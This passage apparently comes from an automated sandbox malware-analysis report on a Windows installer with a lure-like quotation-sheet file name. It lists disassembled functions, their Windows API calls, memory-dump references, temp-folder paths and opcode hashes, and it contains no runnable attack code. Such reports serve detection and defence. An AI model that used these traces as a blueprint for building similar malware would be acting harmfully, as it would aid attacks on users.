                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                Function 0040406A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403E47), ref: 00404074
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                                                                • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                                                                • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09
                                                                                Function 00405900 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharNextA.USER32(?,00403316,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000020), ref: 0040590D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID:
                                                                                • API String ID: 3213498283-0
                                                                                • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                • Instruction ID: 09324d9f31138b4eeef2ff36d168370f127a0ca07da70518b642a67bd257cd6d
                                                                                • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                                • Instruction Fuzzy Hash: AEC0806441C654D7C520571080345677FF1EAD1710F148856F0C463251C3346910DB7F

                                                                                Non-executed Functions

                                                                                Function 004049F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                                                • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                                                • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BBB
                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BE6
                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BFA
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404C29
                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C37
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404C48
                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D45
                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DAA
                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DBF
                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DE3
                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E03
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00404E18
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00404E28
                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EA1
                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404F4A
                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F59
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F79
                                                                                • ShowWindow.USER32(?,00000000), ref: 00404FC7
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404FD2
                                                                                • ShowWindow.USER32(00000000), ref: 00404FD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: d70745f7405b5c2a2dc974df1db2f438c32a092c31808a7ff24f4b3e7a673313
                                                                                • Instruction ID: 3cd80f6d66a0a8d02be1144e931921fec7cdafd03fadcad4e17be0217faf115b
                                                                                • Opcode Fuzzy Hash: d70745f7405b5c2a2dc974df1db2f438c32a092c31808a7ff24f4b3e7a673313
                                                                                • Instruction Fuzzy Hash: 9D026EB0900209AFEB10DF94DD85AAE7BB5FB84315F10813AF611B62E1C7789E42DF58
                                                                                Function 00404486 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                                                • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                                                • lstrcmpiA.KERNEL32(Call,ldreboligblokkene: Installing), ref: 004045ED
                                                                                • lstrcatA.KERNEL32(?,Call), ref: 004045F9
                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                                                  • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406126
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406138
                                                                                  • Part of subcall function 004060CE: CharPrevA.USER32(?,?,75DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                                                • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                                                  • Part of subcall function 0040483D: lstrlenA.KERNEL32(ldreboligblokkene: Installing,ldreboligblokkene: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                  • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                                                  • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,ldreboligblokkene: Installing), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$Call$ldreboligblokkene: Installing
                                                                                • API String ID: 2624150263-2820427717
                                                                                • Opcode ID: e37c6c9a1e4bb5c1d646026eaa914d30a29c7d8e35a995df9d5ec9a0e9ed0814
                                                                                • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                                                • Opcode Fuzzy Hash: e37c6c9a1e4bb5c1d646026eaa914d30a29c7d8e35a995df9d5ec9a0e9ed0814
                                                                                • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                                                Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                • String ID:
                                                                                • API String ID: 4227406936-0
                                                                                • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 0040211D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 123533781-3731622782
                                                                                • Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                                                • Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
                                                                                • Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
                                                                                • Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54
                                                                                Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                                                • Instruction ID: 89e5e1f79722e37631beb13baf5993bff89a91e8d172cde9574b2276e59dc765
                                                                                • Opcode Fuzzy Hash: a658cef3a5151b2b290093738bd42b6efc4bc145775ef21b79a10a3d683c1761
                                                                                • Instruction Fuzzy Hash: CCF02072608100AFE700EBB48948AEEB778DF20324F60057BE240A20C1C7B84A849A3A
                                                                                Function 00404191 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                                                • GetSysColor.USER32(?), ref: 0040425F
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                                                • lstrlenA.KERNEL32(?), ref: 00404280
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                                                • SendMessageA.USER32(00000000), ref: 00404309
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                                                • SetCursor.USER32(00000000), ref: 0040438C
                                                                                • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                                                • SetCursor.USER32(00000000), ref: 004043AF
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: Call$N$\A@$open
                                                                                • API String ID: 3615053054-2472894765
                                                                                • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                                                • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                Function 00405BAC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                                                • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                                                • wsprintfA.USER32 ref: 00405C23
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                                                • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
